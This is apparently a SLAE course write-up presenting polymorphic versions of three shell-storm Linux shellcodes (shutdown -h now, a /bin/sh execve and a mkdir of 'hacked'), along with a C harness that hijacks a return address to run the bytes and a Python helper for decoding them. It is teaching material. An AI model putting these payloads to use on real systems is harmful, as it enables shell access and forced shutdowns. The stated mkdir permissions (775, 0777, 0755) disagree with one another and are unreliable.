; http://shell-storm.org/shellcode/files/shellcode-876.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 69 bytes
global _start
_start:
cdq                                 ; edx = 0 (eax is small at entry)
mul edx                             ; eax = 0, edx = 0
push word 0x682d                    ; "-h"
mov edi, esp                        ; argv[1] -> "-h"
push eax                            ; NUL padding
push 0x6e                           ; "n\0\0\0"
mov WORD [esp+0x1], 0x776f          ; -> "now\0"
mov esi, esp                        ; argv[2] -> "now" (esi is pushed below)
mov dword [esp-4], 0x6e776f64       ; "down"
mov dword [esp-8], 0x74756873       ; "shut"
mov dword [esp-12], 0x2f2f2f6e      ; "n///"
mov dword [esp-16], 0x6962732f      ; "/sbi"
sub esp, 16                         ; esp -> "/sbin///shutdown"
mov ebx, esp                        ; argv[0] / filename
push edx                            ; NULL terminator of argv
push esi
push edi
push ebx
mov ecx, esp                        ; ecx -> argv
mov al, 0xb                         ; sys_execve
int 0x80
As we can see in the block of code, the assembly has been modified to produce a different shellcode that gives the same result. The modified version is 69 bytes, which is less than 150% of the original shellcode. The maximum allowed for the assignment with this sample is 84 bytes.
; http://shell-storm.org/shellcode/files/shellcode-752.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 30 bytes
global _start
_start:
xor eax, eax
xor ecx, ecx
push eax
mov dword [esp-4], 0x68732f2f
mov dword [esp-8], 0x6e69622f
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80
The polymorphic version is 30 bytes, which is a bit more but still less than 150% of the original shellcode. Since the original shellcode was pretty small, there are fewer possibilities to make it smaller with different instructions. The maximum size allowed is 31 bytes.
/*
 * This shellcode will do a mkdir() of 'hacked' and then an exit()
 * Written by zillion@safemode.org
 */
char shellcode[] =
    "\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
    "\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
    "\x61\x63\x6b\x65\x64\x23";

int main(void)
{
    int *ret;
    /* Overwrite main()'s saved return address so that returning
       jumps into the shellcode buffer (classic test harness). */
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
    return 0;
}
The author only gave the shellcode bytes. So, for the purpose of the SLAE, we will recover the assembly of that shellcode to understand it better and be able to create a polymorphic version of it.
The original shellcode has 36 bytes. Let's make a polymorphic version and see if we can make a smaller one.
Polymorphic shellcode version
I realized that a lot of the assembly in the original can be modified to produce a different version of it. Let's keep it simple. Basically, the shellcode will create a folder named "hacked" using mkdir, with permissions 775.
My final assembly polymorphic shellcode is pretty different but does the same thing.
; http://shell-storm.org/shellcode/files/shellcode-542.php
; Polymorphic version modified by @davidlebr1 for SLAE certification - 28 bytes
global _start
_start:
xor eax, eax
push eax                ; NUL terminator for the path
; sys_mkdir
mov al, 0x27
; push "./hacked"
push 0x64656b63         ; "cked"
push 0x61682f2e         ; "./ha"
mov ebx, esp            ; ebx -> "./hacked"
; mode 0777, which is 0x1ff in hex
mov cx, 0x1ff
int 0x80
; sys_exit
push 0x1
pop eax
int 0x80
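The checks done by hand above (decoding the pushed immediates back into strings, reading the mkdir mode, counting bytes against the 150% budget) can be scripted. This is an added example, not code from the original post; the shellcode bytes are copied from the mkdir sample on this page, the helper names are my own.

```python
# Added example: small analysis helpers for the SLAE polymorphic-shellcode
# checks above. Only the MKDIR_ORIGINAL bytes come from the page; the
# function names and sample immediates are constructed for illustration.
import struct

# Original mkdir('hacked') shellcode from the page (36 bytes).
MKDIR_ORIGINAL = (
    b"\xeb\x16\x5e\x31\xc0\x88\x46\x06\xb0\x27\x8d\x1e\x66\xb9\xed"
    b"\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x68"
    b"\x61\x63\x6b\x65\x64\x23"
)


def stack_string(immediates):
    """Rebuild the string written to the stack by a run of `push imm32`
    (or `mov dword [esp-N], imm32`) stores listed in program order.
    The first store lands at the highest address, so the list is reversed
    and each dword unpacked little-endian; trailing NULs are the terminator."""
    data = b"".join(struct.pack("<I", imm) for imm in reversed(immediates))
    return data.rstrip(b"\x00").decode("ascii")


def mov_cx_immediate(code):
    """Return the imm16 of the first `mov cx, imm16` (opcode 66 B9) in code,
    or None. Reads the mode handed to mkdir without a disassembler."""
    idx = code.find(b"\x66\xb9")
    if idx < 0 or idx + 4 > len(code):
        return None
    return struct.unpack_from("<H", code, idx + 2)[0]


def size_budget(original_len):
    """SLAE rule used above: polymorphic size must not exceed 150%."""
    return int(original_len * 1.5)


def within_budget(original_len, poly_len):
    return poly_len <= size_budget(original_len)


def has_null_byte(code):
    """A NUL byte would truncate the payload when copied as a C string."""
    return b"\x00" in code


if __name__ == "__main__":
    print(stack_string([0x64656b63, 0x61682f2e]))      # ./hacked
    print(oct(mov_cx_immediate(MKDIR_ORIGINAL)))
    print(len(MKDIR_ORIGINAL), size_budget(len(MKDIR_ORIGINAL)))
```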